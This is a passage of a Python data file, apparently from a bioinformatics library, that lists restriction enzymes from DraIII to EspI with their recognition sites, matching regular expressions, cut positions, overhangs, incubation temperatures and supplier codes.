'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNNNGTG',
'size': 9,
'substrat': 'DNA',
'suppl': ('I', 'M', 'N', 'V'),
}
rest_dict['DraIII'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'CAAGNAC'),
'compsite': '(?=(?P<DraRI>CAAG.AC))|(?=(?P<DraRI_as>GT.CTTG))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAAGNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DraRI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GACNNNNNNGTC'),
'compsite': '(?=(?P<DrdI>GAC......GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNNGTC',
'size': 12,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['DrdI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAACCA'),
'compsite': '(?=(?P<DrdII>GAACCA))|(?=(?P<DrdII_as>TGGTTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAACCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DrdII'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'TACGAC'),
'compsite': '(?=(?P<DrdIV>TACGAC))|(?=(?P<DrdIV_as>GTCGTA))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TACGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DrdIV'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GACNNNNNGTC'),
'compsite': '(?=(?P<DriI>GAC.....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNGTC',
'size': 11,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['DriI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCRYGG'),
'compsite': '(?=(?P<DsaI>CC[AG][CT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CRYG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCRYGG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DsaI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GACNNNNNNGTC'),
'compsite': '(?=(?P<DseDI>GAC......GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNNGTC',
'size': 12,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['DseDI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACNCAC'),
'compsite': '(?=(?P<DvuIII>CAC.CAC))|(?=(?P<DvuIII_as>GTG.GTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNCAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DvuIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'YGGCCR'),
'compsite': '(?=(?P<EaeI>[CT]GGCC[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YGGCCR',
'size': 6,
'substrat': 'DNA',
'suppl': ('K', 'N'),
}
rest_dict['EaeI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
'compsite': '(?=(?P<EagI>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['EagI'] = _temp()
def _temp():
return {
'charac': (7, 4, None, None, 'CTCTTC'),
'compsite': '(?=(?P<Eam1104I>CTCTTC))|(?=(?P<Eam1104I_as>GAAGAG))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCTTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eam1104I'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GACNNNNNGTC'),
'compsite': '(?=(?P<Eam1105I>GAC.....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNGTC',
'size': 11,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eam1105I'] = _temp()
def _temp():
return {
'charac': (7, 4, None, None, 'CTCTTC'),
'compsite': '(?=(?P<EarI>CTCTTC))|(?=(?P<EarI_as>GAAGAG))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCTTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['EarI'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'GGCGGA'),
'compsite': '(?=(?P<EciI>GGCGGA))|(?=(?P<EciI_as>TCCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['EciI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GAGCTC'),
'compsite': '(?=(?P<Ecl136II>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Ecl136II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGGNAAG'),
'compsite': '(?=(?P<Ecl234I>CGG.AAG))|(?=(?P<Ecl234I_as>CTT.CCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGNAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ecl234I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAAYTC'),
'compsite': '(?=(?P<Ecl35734I>GAAA[CT]TC))|(?=(?P<Ecl35734I_as>GA[AG]TTTC))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAAYTC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ecl35734I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
'compsite': '(?=(?P<EclXI>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('S',),
}
rest_dict['EclXI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TACGTA'),
'compsite': '(?=(?P<Eco105I>TACGTA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TACGTA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco105I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCWWGG'),
'compsite': '(?=(?P<Eco130I>CC[AT][AT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CWWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWWGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco130I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGGCCT'),
'compsite': '(?=(?P<Eco147I>AGGCCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGCCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco147I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GRGCYC'),
'compsite': '(?=(?P<Eco24I>G[AG]GC[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'RGCY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco24I'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'GGTCTC'),
'compsite': '(?=(?P<Eco31I>GGTCTC))|(?=(?P<Eco31I_as>GAGACC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco31I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GATATC'),
'compsite': '(?=(?P<Eco32I>GATATC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATATC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco32I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRARCAG'),
'compsite': '(?=(?P<Eco43896II>C[AG]A[AG]CAG))|(?=(?P<Eco43896II_as>CTG[CT]T[CT]G))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRARCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Eco43896II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAABCC'),
'compsite': '(?=(?P<Eco4465II>GAAA[CGT]CC))|(?=(?P<Eco4465II_as>GG[ACG]TTTC))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAABCC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Eco4465II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGWCC'),
'compsite': '(?=(?P<Eco47I>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco47I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGCGCT'),
'compsite': '(?=(?P<Eco47III>AGCGCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCGCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'M', 'R', 'S'),
}
rest_dict['Eco47III'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
'compsite': '(?=(?P<Eco52I>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Eco52I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GAGCTC'),
'compsite': '(?=(?P<Eco53kI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Eco53kI'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTGAAG'),
'compsite': '(?=(?P<Eco57I>CTGAAG))|(?=(?P<Eco57I_as>CTTCAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco57I'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTGRAG'),
'compsite': '(?=(?P<Eco57MI>CTG[AG]AG))|(?=(?P<Eco57MI_as>CT[CT]CAG))',
'dna': None,
'freq': 2048.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Eco57MI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<Eco72I>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco72I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTNAGG'),
'compsite': '(?=(?P<Eco81I>CCT.AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAGG',
'size': 7,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Eco81I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<Eco88I>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco88I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTNACC'),
'compsite': '(?=(?P<Eco91I>GGT.ACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTNAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTNACC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco91I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RCSRC'),
'compsite': '(?=(?P<EcoBLMcrX>[AG]C[CG][AG]C))|(?=(?P<EcoBLMcrX_as>G[CT][CG]G[CT]))',
'dna': None,
'freq': 128.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCSRC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoBLMcrX'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACCYAC'),
'compsite': '(?=(?P<EcoE1140I>ACC[CT]AC))|(?=(?P<EcoE1140I_as>GT[AG]GGT))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCYAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoE1140I'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCSGG'),
'compsite': '(?=(?P<EcoHI>CC[CG]GG))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCSGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCSGG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoHI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGTAAG'),
'compsite': '(?=(?P<EcoHSI>GGTAAG))|(?=(?P<EcoHSI_as>CTTACC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoHSI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GAGCTC'),
'compsite': '(?=(?P<EcoICRI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'R', 'V'),
}
rest_dict['EcoICRI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CANCATC'),
'compsite': '(?=(?P<EcoMVII>CA.CATC))|(?=(?P<EcoMVII_as>GATG.TG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CANCATC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoMVII'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CCTNNNNNAGG'),
'compsite': '(?=(?P<EcoNI>CCT.....AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNNNNNAGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['EcoNI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ATGAAG'),
'compsite': '(?=(?P<EcoNIH6II>ATGAAG))|(?=(?P<EcoNIH6II_as>CTTCAT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoNIH6II'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGGNCCY'),
'compsite': '(?=(?P<EcoO109I>[AG]GG.CC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGNCCY',
'size': 7,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'N'),
}
rest_dict['EcoO109I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTNACC'),
'compsite': '(?=(?P<EcoO65I>GGT.ACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTNAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTNACC',
'size': 7,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['EcoO65I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GAATTC'),
'compsite': '(?=(?P<EcoRI>GAATTC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAATTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['EcoRI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCWGG'),
'compsite': '(?=(?P<EcoRII>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'J'),
}
rest_dict['EcoRII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GATATC'),
'compsite': '(?=(?P<EcoRV>GATATC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATATC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['EcoRV'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCWWGG'),
'compsite': '(?=(?P<EcoT14I>CC[AT][AT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CWWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWWGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['EcoT14I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'ATGCAT'),
'compsite': '(?=(?P<EcoT22I>ATGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['EcoT22I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GRGCYC'),
'compsite': '(?=(?P<EcoT38I>G[AG]GC[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'RGCY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('J',),
}
rest_dict['EcoT38I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGCGCC'),
'compsite': '(?=(?P<EgeI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['EgeI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGCGCC'),
'compsite': '(?=(?P<EheI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['EheI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCGGAG'),
'compsite': '(?=(?P<Eli8509II>CCGGAG))|(?=(?P<Eli8509II_as>CTCCGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Eli8509II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCWWGG'),
'compsite': '(?=(?P<ErhI>CC[AT][AT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CWWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWWGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['ErhI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TCGA'),
'compsite': '(?=(?P<EsaBC3I>TCGA))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGA',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EsaBC3I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GACCAC'),
'compsite': '(?=(?P<EsaSSI>GACCAC))|(?=(?P<EsaSSI_as>GTGGTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACCAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EsaSSI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CAGAAG'),
'compsite': '(?=(?P<Esp3007I>CAGAAG))|(?=(?P<Esp3007I_as>CTTCTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Esp3007I'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'CGTCTC'),
'compsite': '(?=(?P<Esp3I>CGTCTC))|(?=(?P<Esp3I_as>GAGACG))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'N'),
}
rest_dict['Esp3I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCTNAGC'),
'compsite': '(?=(?P<EspI>GCT.AGC))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTNAGC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EspI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CATG'),
'compsite': '(?=(?P<FaeI>CATG))',
'dna': None,
